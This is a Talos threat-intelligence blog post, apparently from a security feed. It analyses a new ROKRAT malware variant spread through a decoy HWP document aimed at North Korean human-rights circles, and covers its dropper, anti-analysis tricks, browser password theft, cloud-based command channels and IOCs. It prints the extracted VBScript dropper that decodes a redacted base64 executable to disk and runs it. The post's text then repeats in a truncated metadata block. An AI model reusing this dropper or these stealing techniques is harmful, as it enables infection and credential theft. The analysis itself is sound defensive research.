ID TALOSBLOG:52B6D17B9E11E344D5E57299287AAE60 Type talosblog Reporter noreply@blogger.com (Paul Rascagneres) Modified 2017-11-28T21:37:03
Description
<div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: left;">This post was authored by <a href="https://www.twitter.com/SecurityBeard/">Warren Mercer</a>, <a href="https://www.twitter.com/r00tbsd">Paul Rascagneres</a> and with contributions from Jungsoo An.</div><div class="separator" style="clear: both; text-align: left;"><br /></div><h2 id="h.u88nk5hyyxit">Executive Summary</h2><br />Earlier this year, Talos published 2 articles concerning South Korean threats. The <a href="http://blog.talosintelligence.com/2017/02/korean-maldoc.html">first one</a> was about the use of a malicious HWP document which dropped downloaders used to retrieve malicious payloads on several compromised websites. One of the website was a compromised government website. We named this case "Evil New Years". The <a href="http://blog.talosintelligence.com/2017/04/introducing-rokrat.html">second one</a> was about the analysis and discovery of the ROKRAT malware.<br /><br />This month, Talos discovered a new ROKRAT version. This version contains technical elements that link the two previous articles. This new sample contains code from the two publications earlier this year:<br /><br /><ul><li>It contains the same reconnaissance code used;</li><li>Similar PDB pattern that the "Evil New Years" samples used;</li><li>it contains the same cloud features and similar copy-paste methods that ROKRAT used;</li><li>It uses cloud platform as C&C but not exactly the same. This version uses pcloud, box, dropbox and yandex.</li></ul><br /><a name='more'></a><br /><br />We also discovered that this new version of ROKRAT shares code with Freenki, a downloader used in the FreeMilk campaign. <br /><br />The campaign started, unsurprisingly, with a malicious HWP document. This document was alleged to be written by a lawyer who claims to represent the "Citizens' Alliance for North Korean Human Rights and Reunification of Korean Peninsula". It mentions a meeting of this group that took place the 1st of November at Seoul. Due to the content of this malicious document we can assume that the targets are interested by the situation in North Korea. This malicious document drops and executes a new version of ROKRAT.<br /><br /><h2 id="h.2y4opzdosnm4">HWP Malicious Document</h2><br />As with the previous ROKRAT campaigns we described the infection vector used with this actor is a malicious HWP document. The HWP files are created using Hangul Word Processor, a popular alternative to Microsoft Office for South Korean users developed by Hancom. Here is a screenshot of the malicious document:<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-oZY_XkhLCak/WhyBjcvv1DI/AAAAAAAAAMY/EtxUBxnlW0I7Zw5dvU4cVLCmMy3vVYzEwCLcBGAs/s1600/image7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1109" data-original-width="739" height="640" src="https://2.bp.blogspot.com/-oZY_XkhLCak/WhyBjcvv1DI/AAAAAAAAAMY/EtxUBxnlW0I7Zw5dvU4cVLCmMy3vVYzEwCLcBGAs/s640/image7.png" width="426" /></a></div><br />The malicious document mentions the "Community of North Korean human right and unification". We first observed his campaign during November 2017. The document was alleged to be written by a lawyer who has been representing the community known as '올인통 (올바른북한인권법과통일을위한시민모임)'.<br /><br />The purpose of the document is to arrange a meeting to discuss about items which are related to 'North Korean Human Rights Act' and 'Enactment of a law' which passed in last 2016 in South Korea.<br /><br />Based on the meeting date (1st Nov 2017), this decoy document could be delivered to the stakeholders in the community '올인통' by pretending to be a request to join the discussion for finding better ideas/ways to let more people be interested in their activity before Nov 2017.<br /><br />The HWP file contains an OLE object named BIN0001.OLE. Once extracted and uncompressed (zlib), we obtain the following script:<br /><pre>const strEncode = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA6AAAAA4fug4AtAnNIbgBTM0hV[...redacted...]AAAAAAAAAAAAAAAAAAAAAA="<br />DIM outFile<br />DIM base64Decoded<br />DIM shell_obj<br />SET shell_obj = CreateObject("WScript.Shell")<br />DIM fso<br />SET fso = CreateObject("Scripting.FileSystemObject")<br />outFile = "c:\ProgramData\HncModuleUpdate.exe"<br />base64Decoded = decodeBase64(strEncode)<br />IF NOT(fso.FileExists(outFile)) then<br />writeBytes outFile, base64Decoded<br />shell_obj.run outFile<br />END IF<br />WScript.Quit()<br />private function decodeBase64(base64)<br />DIM DM, EL<br />SET DM = CreateObject("Microsoft.XMLDOM")<br />SET EL = DM.createElement("tmp")<br />EL.DataType = "bin.base64"<br />EL.Text = base64<br />decodeBase64 = EL.NodeTypedValue<br />end function<br />private Sub writeBytes(file, bytes)<br />DIM binaryStream<br />SET binaryStream = CreateObject("ADODB.Stream")<br />binaryStream.Type = 1<br />binaryStream.Open<br />binaryStream.Write bytes<br />binaryStream.SaveToFile file, 1<br />End Sub<br /></pre>The purpose is to decode, using the base64 algorithm, the content of the strEncode variable. The decoded data is stored in the c:\ProgramData\HncModuleUpdate.exe file and executed. The binary is the ROKRAT dropper. The specific filename 'HncModuleUpdate' may fool a user into thinking this is a Hancom software.<br /><br /><h2 id="h.kx21mld8n9je">Stage 1: Dropper</h2><br />The purpose of the dropper is to extract the resource named SBS. This resource contains malicious shellcode. Additionally, the dropper executes a new cmd.exe process, injects the extracted resource and executes it. The code injection is performed by the VirtualAlloc(), WriteProcessMemory() and CreateRemoteThread() APIs:<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://4.bp.blogspot.com/-UK3O08XFp2k/WhyBximnWLI/AAAAAAAAAMc/s5N3fKQBks4xpcTOH6GtWfOMVzQS_TwCLcBGAs/s1600/image6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="932" data-original-width="740" height="640" src="https://4.bp.blogspot.com/-UK3O08XFp2k/WhyBximnWLI/AAAAAAAAAMc/s5N3fKQBks4xpcTOH6GtWfOMVzQS_TwCLcBGAs/s640/image6.png" width="508" /></a></div><br />Once executed, the shellcode will decoded a PE file, will load it in the memory of cmd.exe and finally will execute it. This payload is a new variant of ROKRAT.<br /><br />Additionally, one of the analysed droppers displays a picture to the user:<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-UdRh6pJR0FU/WhyB6um-i6I/AAAAAAAAAMg/Rujz_rpXM8AIMWxHayfmA7v0sdKxbxYawCLcBGAs/s1600/image20.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="765" data-original-width="865" height="353" src="https://2.bp.blogspot.com/-UdRh6pJR0FU/WhyB6um-i6I/AAAAAAAAAMg/Rujz_rpXM8AIMWxHayfmA7v0sdKxbxYawCLcBGAs/s400/image20.png" width="400" /></a></div><br />The people in the pictures are about the Korean war and people related to independence troops during the "independence movement". The image on the top left comes from <a href="https://ko.wikipedia.org/wiki/%EB%B0%B1%EC%84%A0%EC%97%BD">Wikipedia</a>. The picture in the middle left comes from <a href="http://m.blog.daum.net/_blog/_m/articleView.do?blogid=0UCYA&articleno=1545">this blog</a>. And the bottom left image comes from this <a href="http://m.ohmynews.com/NWS_Web/Mobile/at_pg.aspx?CNTN_CD=A0000939170#cb">news website</a>. The decoy image seems to be a set of public pictures.<br /><br /><h2 id="h.wf5zmxoij2lr">Stage 2: ROKRAT</h2><h3 id="h.c571fjfldgt2">Similarities With the "Evil New Years" MalDoc</h3><br />This variant of ROKRAT contains similar code with the "Evil New Years" downloader. The information collected during the reconnaissance phase is similar. The malware uses the following registry key to get the machine type: HKLM\System\CurrentControlSet\Services\mssmbios\Data\SMBiosData. The "System manufacturer" value is used to identify the type of machine. Here is the graph flow of the "Evil New Years" downloader:<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://4.bp.blogspot.com/-ThSGoJ2fiL8/WhyCFM6M3SI/AAAAAAAAAMo/kS5m9vVHIhUAhkMPEhb-YiPH5-WISQ0hgCLcBGAs/s1600/image10.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="705" data-original-width="995" height="452" src="https://4.bp.blogspot.com/-ThSGoJ2fiL8/WhyCFM6M3SI/AAAAAAAAAMo/kS5m9vVHIhUAhkMPEhb-YiPH5-WISQ0hgCLcBGAs/s640/image10.png" width="640" /></a></div><br />The graph flow of the ROKRAT variant:<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-sshO1piH2Z4/WhyCKaO_YUI/AAAAAAAAAMs/T-ioks5MAWQP9yqvUiBKHLO88h3IIGBQgCLcBGAs/s1600/image13.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="703" data-original-width="999" height="450" src="https://2.bp.blogspot.com/-sshO1piH2Z4/WhyCKaO_YUI/AAAAAAAAAMs/T-ioks5MAWQP9yqvUiBKHLO88h3IIGBQgCLcBGAs/s640/image13.png" width="640" /></a></div><br />The graph flows are 99% similar. Additionally, the machine type is described with the following strings:<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://4.bp.blogspot.com/-P3vttCd3--8/WhyCQUU2stI/AAAAAAAAAMw/yqLRBtpi1DUNwbOJ8WiPWn9nC3rtishggCLcBGAs/s1600/image8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="189" data-original-width="476" height="254" src="https://4.bp.blogspot.com/-P3vttCd3--8/WhyCQUU2stI/AAAAAAAAAMw/yqLRBtpi1DUNwbOJ8WiPWn9nC3rtishggCLcBGAs/s640/image8.png" width="640" /></a></div><br />The code appears to be based on this <a href="http://www.rohitab.com/discuss/topic/35915-win32-api-to-get-system-information/?p%3D10075283">forum</a> post describing the use of the Win32 APIs used. The source code only considers the following type:<br /><pre>default: lpString = "(Other)"; break;<br />case 0x02: lpString = "(Unknown)"; break;<br />case 0x03: lpString = "(Desktop)"; break;<br />case 0x04: lpString = "(Low Profile Desktop)"; break;<br />case 0x06: lpString = "(Mini Tower)"; break;<br />case 0x07: lpString = "(Tower)"; break;<br />case 0x08: lpString = "(Portable)"; break;<br />case 0x09: lpString = "(Laptop)"; break;<br />case 0x0A: lpString = "(Notebook)"; break;<br />case 0x0E: lpString = "(Sub Notebook)"; break;<br /></pre>Notice the () used by the ROKRAT author too. Some values are ignored as we can see from the <a href="http://www.dmtf.org/sites/default/files/standards/documents/DSP0134_2.7.0.pdf">SMBIOS documentation</a>:<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-0Ere0jsIaBM/WhyCWDThHsI/AAAAAAAAAM0/hGb9Yd4MiZ85bo8q1mlGuZ8VzRrFI690wCLcBGAs/s1600/image19.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="861" data-original-width="645" height="640" src="https://2.bp.blogspot.com/-0Ere0jsIaBM/WhyCWDThHsI/AAAAAAAAAM0/hGb9Yd4MiZ85bo8q1mlGuZ8VzRrFI690wCLcBGAs/s640/image19.png" width="478" /></a></div><br />The missing values are also omitted from the forum post.<br /><br />Another similarity is the PDB path. The "Evil New Year" sample contained the following PDB path: <br /><ul><li><pre>e:\Happy\Work\Source\version 12\T+M\Result\DocPrint.pdb</pre></li></ul>This new ROKRAT variant contains the following PDB:<br /><ul><li><pre>d:\HighSchool\version 13\2ndBD\T+M\T+M\Result\DocPrint.pdb</pre></li></ul>We clearly have the similar pattern.<br /><h3 id="h.4oudy5rvmx9b">Anti-Sandbox</h3><br />This ROKRAT variant contain anti-sandbox tricks. This is performed by checking if the following libraries are loaded:<br /><br /><ul><li>SbieDll.dll (sandboxie library)</li><li>Dbghelp.dll (Microsoft debugging tools)</li><li>Api_log.dll (threatAnalyzer / GFI SandBox)</li><li>Dir_watch.dll (threatAnalyzer / GFI SandBox)</li></ul><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-tMpcUMOjVY4/WhyCeLjiTtI/AAAAAAAAAM4/55qQDK6rByglGRQeSmTpw6kLM3ksCkJ9QCLcBGAs/s1600/image4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="668" data-original-width="1142" height="374" src="https://3.bp.blogspot.com/-tMpcUMOjVY4/WhyCeLjiTtI/AAAAAAAAAM4/55qQDK6rByglGRQeSmTpw6kLM3ksCkJ9QCLcBGAs/s640/image4.png" width="640" /></a></div><h3 id="h.v1caqmjuebfo">Anti-Debug</h3><br />This ROKRAT version contains anti-debug tricks. For example it uses the following NOP technique:<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/--2thdwNFFWk/WhyCxluop1I/AAAAAAAAANA/ZvScFYWEfmEX8V0XKU8Ab3e6RR9Nl3vFACLcBGAs/s1600/image5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="498" data-original-width="727" height="438" src="https://2.bp.blogspot.com/--2thdwNFFWk/WhyCxluop1I/AAAAAAAAANA/ZvScFYWEfmEX8V0XKU8Ab3e6RR9Nl3vFACLcBGAs/s640/image5.png" width="640" /></a></div><br />nop dword ptr [eax+eax+00h] is a 5 bytes NOP: 0x0F1F440000. But this opcode is not correctly supported by Immunity Debugger, the assembly is replaced by "???" in red in the screenshot:<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-FOQkjTQlNvA/WhyC3zsnVTI/AAAAAAAAANE/WmpI7gwqSBM75SG_ls-3cHjVzcKC50JTgCLcBGAs/s1600/image2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="345" data-original-width="684" height="322" src="https://1.bp.blogspot.com/-FOQkjTQlNvA/WhyC3zsnVTI/AAAAAAAAANE/WmpI7gwqSBM75SG_ls-3cHjVzcKC50JTgCLcBGAs/s640/image2.png" width="640" /></a></div><h3 id="h.nuvmlbdrfycg">Screenshots Feature</h3><br />The two ROKRAT versions performed screenshots. It's interesting to note similarities between the two versions. Especially the filename of the saved screenshot, here is the April ROKRAT version:<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-9U3juJSttOw/WhyC_xXCS7I/AAAAAAAAANI/QFDm3a7rfxQcmAM_ly8YHcSBuD4WW6FegCLcBGAs/s1600/image17.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="863" data-original-width="659" height="640" src="https://2.bp.blogspot.com/-9U3juJSttOw/WhyC_xXCS7I/AAAAAAAAANI/QFDm3a7rfxQcmAM_ly8YHcSBuD4WW6FegCLcBGAs/s640/image17.png" width="488" /></a></div><br />And the code of the November version:<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/--n6yXqONkEs/WhyDFe5MlnI/AAAAAAAAANM/3XsNWR3OdBUI3VK6FQLIhAGsopYx4WT5ACLcBGAs/s1600/image11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="744" data-original-width="810" height="586" src="https://1.bp.blogspot.com/--n6yXqONkEs/WhyDFe5MlnI/AAAAAAAAANM/3XsNWR3OdBUI3VK6FQLIhAGsopYx4WT5ACLcBGAs/s640/image11.png" width="640" /></a></div><br />The pattern is exactly the same: %s%04X%04X.tmp. The two %04X are random values. And the %s contains a temporary path (obtained with GetTempPath()). In both sample, the string length is 0x12C (300). This part is clearly a copy-paste.<br /><h3 id="h.kg3288afhmp8">Browser Password Stealer</h3><br />One of the analysed November ROKRAT samples contained a browser stealing capability. The malware is able to extract the stored passwords from Internet Explorer, Chrome and Firefox. For Chrome and Firefox, the malware queries the sqlite database containing the URL, username and password:<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-1c4E_cI5198/WhyDL5Xq05I/AAAAAAAAANQ/pkyAlBQDvAgq3n9AX1XpGuRd8uLEQhbVACLcBGAs/s1600/image3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="383" data-original-width="884" height="276" src="https://2.bp.blogspot.com/-1c4E_cI5198/WhyDL5Xq05I/AAAAAAAAANQ/pkyAlBQDvAgq3n9AX1XpGuRd8uLEQhbVACLcBGAs/s640/image3.png" width="640" /></a></div><br />Additionally, ROKRAT supports the Microsoft Vault mechanism. Vault was implemented in Windows 7, it contains any sensitive data (like the credentials) of Internet Explorer. Here is the initialization of the Vault APIs:<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-kgM45XXgNKw/WhyDSVHJD5I/AAAAAAAAANY/y18ZaMeY3XAiJJt0c2qUT88YUc-HQfPtACLcBGAs/s1600/image14.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="728" data-original-width="446" height="640" src="https://2.bp.blogspot.com/-kgM45XXgNKw/WhyDSVHJD5I/AAAAAAAAANY/y18ZaMeY3XAiJJt0c2qUT88YUc-HQfPtACLcBGAs/s640/image14.png" width="390" /></a></div><br />The ROKRAT implementation is largely based on the <a href="https://www.codeproject.com/Articles/1167943/The-Secrets-of-Internet-Explorer-Credentials">following project</a>. This is a change of tactic for ROKRAT when compared with previous samples/versions. This time the actor is specifically targeting information which would be used for additional compromises and maybe even on potential personal accounts. The method used by the ROKRAT actors was also out of the ordinary as they embedded the whole SQLite library into their executable to allow the SQLite browsing attempts used for Firefox & Google Chrome.<br /><br />During our investigation, we discovered that the browser password stealer code is exactly the same as the code used during the <a href="https://researchcenter.paloaltonetworks.com/2017/10/unit42-freemilk-highly-targeted-spear-phishing-campaign/">FreeMilk</a> campaign described by Unit 42. In this article, the author already noticed C2 infrastructure overlap between FreeMilk and ROKRAT. In addition, we can add that some code overlap is present between the 2 samples:<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-wgeOLIL7OBQ/WhyDX-7egxI/AAAAAAAAANc/bj86udF7beAhD0Q3kWPDDLsJPNjWn-FBwCLcBGAs/s1600/image12.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="960" data-original-width="1504" height="408" src="https://1.bp.blogspot.com/-wgeOLIL7OBQ/WhyDX-7egxI/AAAAAAAAANc/bj86udF7beAhD0Q3kWPDDLsJPNjWn-FBwCLcBGAs/s640/image12.png" width="640" /></a></div><br />On the left, we have the ROKRAT sample and on the right the FreeMilk sample. We can notice that in addition to the code, the author copy-pasted English typos such as "IE Registery".<br /><h3 id="h.xczovqmmm9yy">Cloud Platforms Used As C&C</h3><br />Finally, this ROKRAT version uses cloud platforms in exactly the same way as our previous analysis. This time, the author did not use social network platforms, but different cloud providers:<br /><br /><ul><li><div class="separator" style="clear: both; text-align: center;"></div><h4 id="h.xh482qf6mdeh">pcloud</h4></li></ul><ul></ul><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-PrgljjxiAFo/WhyEcoSdFdI/AAAAAAAAAN4/bdK6iwGJ8moRLm9NDzv_5CVZx82QlV0NQCLcBGAs/s1600/image18.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="624" data-original-width="537" height="640" src="https://3.bp.blogspot.com/-PrgljjxiAFo/WhyEcoSdFdI/AAAAAAAAAN4/bdK6iwGJ8moRLm9NDzv_5CVZx82QlV0NQCLcBGAs/s640/image18.png" width="550" /></a></div><br /><br /><ul><li><h4 id="h.sdcw9y4wifxc">Box</h4></li></ul><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-mEPlwuN1nzk/WhyEywpiFYI/AAAAAAAAAOA/WJFSGK8Ylp8IQE6Vru-WMQWd57IGHsBkwCLcBGAs/s1600/image15.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="272" data-original-width="590" height="294" src="https://1.bp.blogspot.com/-mEPlwuN1nzk/WhyEywpiFYI/AAAAAAAAAOA/WJFSGK8Ylp8IQE6Vru-WMQWd57IGHsBkwCLcBGAs/s640/image15.png" width="640" /></a></div><div><br /></div><ul><li><h4 id="h.toutdls5ikao">Dropbox</h4></li></ul><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-DFU-dyBrdNg/WhyFAJdvf6I/AAAAAAAAAOM/oP6_ri4qfBQZa3-1tuSvysODAQyRZT73gCLcBGAs/s1600/image9.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="406" data-original-width="567" height="458" src="https://3.bp.blogspot.com/-DFU-dyBrdNg/WhyFAJdvf6I/AAAAAAAAAOM/oP6_ri4qfBQZa3-1tuSvysODAQyRZT73gCLcBGAs/s640/image9.png" width="640" /></a></div><ul><li><h4 id="h.vwluo9xq9uhs">Yandex</h4></li></ul><div class="separator" style="clear: both; text-align: center;"><a href="https://4.bp.blogspot.com/-obpjJED7PA8/WhyFL04Jk0I/AAAAAAAAAOQ/5c1siYoQcdAt8UgR9YIuTXiawtZlN1DhACLcBGAs/s1600/image16.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="249" data-original-width="577" height="276" src="https://4.bp.blogspot.com/-obpjJED7PA8/WhyFL04Jk0I/AAAAAAAAAOQ/5c1siYoQcdAt8UgR9YIuTXiawtZlN1DhACLcBGAs/s640/image16.png" width="640" /></a></div><div><br /></div><h2 id="h.x0mbglid6xf5">Conclusion</h2><br />This campaign shows that the actor behind ROKRAT is still active. Based on the PDB, it could be the 13th version of this malware. This actor made the decision only to use legitimate cloud platforms, but changed some from the last incarnation. From an attacker's perspective it's an interesting choice, the flow is encrypted by default with HTTPS and the malicious flow can be difficult to find in the middle of legitimate traffic to these platforms. We can also determine that the actor likes to use code already available on the internet in various repositories we mentioned throughout this post ie; GitHub, Code Project and other public forums.<br /><br />Based on source code copy-paste, we remain highly confident that the author of ROKRAT is also behind, or working with those behind, the FreeMilk spear phishing campaign. This is further proven by the fact that ROKRAT shares code with Freenki downloader used in the FreeMilk campaign.<br /><br />Moreover, the actor is always interested by the same pattern of targets, the decoy documents refer to precise elements related to the geopolitical situation between North and South Korea. Generally, the documents reference the Ministry of Unification or the situation of North Korean citizens. They frequently contain specific references to real meetings or conferences, showing a high knowledge of current events in North and South Korea.<br /><br />Together this information helps us to understand the profile of the targeted systems and the interests of the threat actor.<br /><br /><h2 id="h.n2mz0vhntu4k">Coverage</h2><br />Additional ways our customers can detect and block this threat are listed below.<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-h3Ubgz2tpKo/WhyDpf-abzI/AAAAAAAAANk/QXJs9157NFcro7ZHWf36KsfFiQ2yjgazgCLcBGAs/s1600/image1.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="268" data-original-width="320" src="https://3.bp.blogspot.com/-h3Ubgz2tpKo/WhyDpf-abzI/AAAAAAAAANk/QXJs9157NFcro7ZHWf36KsfFiQ2yjgazgCLcBGAs/s1600/image1.png" /></a></div>Advanced Malware Protection (<a href="https://www.cisco.com/c/en/us/products/security/advanced-malware-protection">AMP</a>) is ideally suited to prevent the execution of the malware used by these threat actors.<br /><br /><a href="https://www.cisco.com/c/en/us/products/security/cloud-web-security/index.html">CWS</a> or<a href="https://www.cisco.com/c/en/us/products/security/web-security-appliance/index.html"> WSA</a> web scanning prevents access to malicious websites and detects malware used in these attacks.<br /><br /><a href="https://www.cisco.com/c/en/us/products/security/email-security-appliance/index.html">Email Security</a> can block malicious emails sent by threat actors as part of their campaign.<br /><br />Network Security appliances such as<a href="https://www.cisco.com/c/en/us/products/security/firewalls/index.html"> </a><a href="https://www.cisco.com/c/en/us/products/security/firewalls/index.html">NGFW</a>,<a href="https://www.cisco.com/c/en/us/products/security/intrusion-prevention-system-ips/index.html"> </a><a href="https://www.cisco.com/c/en/us/products/security/intrusion-prevention-system-ips/index.html">NGIPS</a>, and<a href="https://meraki.cisco.com/products/appliances"> </a><a href="https://meraki.cisco.com/products/appliances">Meraki MX</a> can detect malicious activity associated with this threat.<br /><br /><a href="https://www.cisco.com/c/en/us/solutions/enterprise-networks/amp-threat-grid/index.html">AMP Threat Grid</a> helps identify malicious binaries and build protection into all Cisco Security products.<br /><br /><a href="https://umbrella.cisco.com/">Umbrella</a>, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.<br /><br />Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on <a href="https://www.snort.org/products">Snort.org</a>.<br /><br /><h2 id="h.kn6j2twaeqyv">IOCs</h2><br />Path: c:\ProgramData\HncModuleUpdate.exe<br />MalDoc: 171e26822421f7ed2e34cc092eaeba8a504b5d576c7fd54aa6975c2e2db0f824<br />Dropper #1: a29b07a6fe5d7ce3147dd7ef1d7d18df16e347f37282c43139d53cce25ae7037<br />Dropper #2: eb6d25e08b2b32a736b57f8df22db6d03dc82f16da554f4e8bb67120eacb1d14<br />Dropper #3: 9b383ebc1c592d5556fec9d513223d4f99a5061591671db560faf742dd68493f<br />ROKRAT: b3de3f9309b2f320738772353eb724a0782a1fc2c912483c036c303389307e2e<br />Freenki: 99c1b4887d96cb94f32b280c1039b3a7e39ad996859ffa6dd011cf3cca4f1ba5<div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/feedburner/Talos?a=fAmkhLaUPK8:-FWTXT_BreY:yIl2AUoC8zA"><img src="http://feeds.feedburner.com/~ff/feedburner/Talos?d=yIl2AUoC8zA" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/feedburner/Talos/~4/fAmkhLaUPK8" height="1" width="1" alt=""/>
{"cvelist": [], "id": "TALOSBLOG:52B6D17B9E11E344D5E57299287AAE60", "type": "talosblog", "history": [], "description": "<div class=\"separator\" style=\"clear: both; text-align: center;\"></div><div class=\"separator\" style=\"clear: both; text-align: left;\">This post was authored by <a href=\"https://www.twitter.com/SecurityBeard/\">Warren Mercer</a>, <a href=\"https://www.twitter.com/r00tbsd\">Paul Rascagneres</a> and with contributions from Jungsoo An.</div><div class=\"separator\" style=\"clear: both; text-align: left;\"><br /></div><h2 id=\"h.u88nk5hyyxit\">Executive Summary</h2><br />Earlier this year, Talos published 2 articles concerning South Korean threats. The <a href=\"http://blog.talosintelligence.com/2017/02/korean-maldoc.html\">first one</a> was about the use of a malicious HWP document which dropped downloaders used to retrieve malicious payloads on several compromised websites. One of the website was a compromised government website. We named this case \"Evil New Years\". The <a href=\"http://blog.talosintelligence.com/2017/04/introducing-rokrat.html\">second one</a> was about the analysis and discovery of the ROKRAT malware.<br /><br />This month, Talos discovered a new ROKRAT version. This version contains technical elements that link the two previous articles. This new sample contains code from the two publications earlier this year:<br /><br /><ul><li>It contains the same reconnaissance code used;</li><li>Similar PDB pattern that the \"Evil New Years\" samples used;</li><li>it contains the same cloud features and similar copy-paste methods that ROKRAT used;</li><li>It uses cloud platform as C&C but not exactly the same. This version uses pcloud, box, dropbox and yandex.</li></ul><br /><a name='more'></a><br /><br />We also discovered that this new version of ROKRAT shares code with Freenki, a downloader used in the FreeMilk campaign. <br /><br />The campaign started, unsurprisingly, with a malicious HWP document. This document was alleged to be written by a lawyer who claims to represent the \"Citizens' Alliance for North Korean Human Rights and Reunification of Korean Peninsula\". It mentions a meeting of this group that took place the 1st of November at Seoul. Due to the content of this malicious document we can assume that the targets are interested by the situation in North Korea. This malicious document drops and executes a new version of ROKRAT.<br /><br /><h2 id=\"h.2y4opzdosnm4\">HWP Malicious Document</h2><br />As with the previous ROKRAT campaigns we described the infection vector used with this actor is a malicious HWP document. The HWP files are created using Hangul Word Processor, a popular alternative to Microsoft Office for South Korean users developed by Hancom. Here is a screenshot of the malicious document:<br /><div class=\"separator\" style=\"clear: both; text-align: center;\"><a href=\"https://2.bp.blogspot.com/-oZY_XkhLCak/WhyBjcvv1DI/AAAAAAAAAMY/EtxUBxnlW0I7Zw5dvU4cVLCmMy3vVYzEwCLcBGAs/s1600/image7.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"><img border=\"0\" data-original-height=\"1109\" data-original-width=\"739\" height=\"640\" src=\"https://2.bp.blogspot.com/-oZY_XkhLCak/WhyBjcvv1DI/AAAAAAAAAMY/EtxUBxnlW0I7Zw5dvU4cVLCmMy3vVYzEwCLcBGAs/s640/image7.png\" width=\"426\" /></a></div><br />The malicious document mentions the \"Community of North Korean human right and unification\". We first observed his campaign during November 2017. The document was alleged to be written by a lawyer who has been representing the community known as '\uc62c\uc778\ud1b5 (\uc62c\ubc14\ub978\ubd81\ud55c\uc778\uad8c\ubc95\uacfc\ud1b5\uc77c\uc744\uc704\ud55c\uc2dc\ubbfc\ubaa8\uc784)'.<br /><br />The purpose of the document is to arrange a meeting to discuss about items which are related to 'North Korean Human Rights Act' and 'Enactment of a law' which passed in last 2016 in South Korea.<br /><br />Based on the meeting date (1st Nov 2017), this decoy document could be delivered to the stakeholders in the community '\uc62c\uc778\ud1b5' by pretending to be a request to join the discussion for finding better ideas/ways to let more people be interested in their activity before Nov 2017.<br /><br />The HWP file contains an OLE object named BIN0001.OLE. Once extracted and uncompressed (zlib), we obtain the following script:<br /><pre>const strEncode = \"TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA6AAAAA4fug4AtAnNIbgBTM0hV[...redacted...]AAAAAAAAAAAAAAAAAAAAAA=\"<br />DIM outFile<br />DIM base64Decoded<br />DIM shell_obj<br />SET shell_obj = CreateObject(\"WScript.Shell\")<br />DIM fso<br />SET fso = CreateObject(\"Scripting.FileSystemObject\")<br />outFile = \"c:\\ProgramData\\HncModuleUpdate.exe\"<br />base64Decoded = decodeBase64(strEncode)<br />IF NOT(fso.FileExists(outFile)) then<br />writeBytes outFile, base64Decoded<br />shell_obj.run outFile<br />END IF<br />WScript.Quit()<br />private function decodeBase64(base64)<br />DIM DM, EL<br />SET DM = CreateObject(\"Microsoft.XMLDOM\")<br />SET EL = DM.createElement(\"tmp\")<br />EL.DataType = \"bin.base64\"<br />EL.Text = base64<br />decodeBase64 = EL.NodeTypedValue<br />end function<br />private Sub writeBytes(file, bytes)<br />DIM binaryStream<br />SET binaryStream = CreateObject(\"ADODB.Stream\")<br />binaryStream.Type = 1<br />binaryStream.Open<br />binaryStream.Write 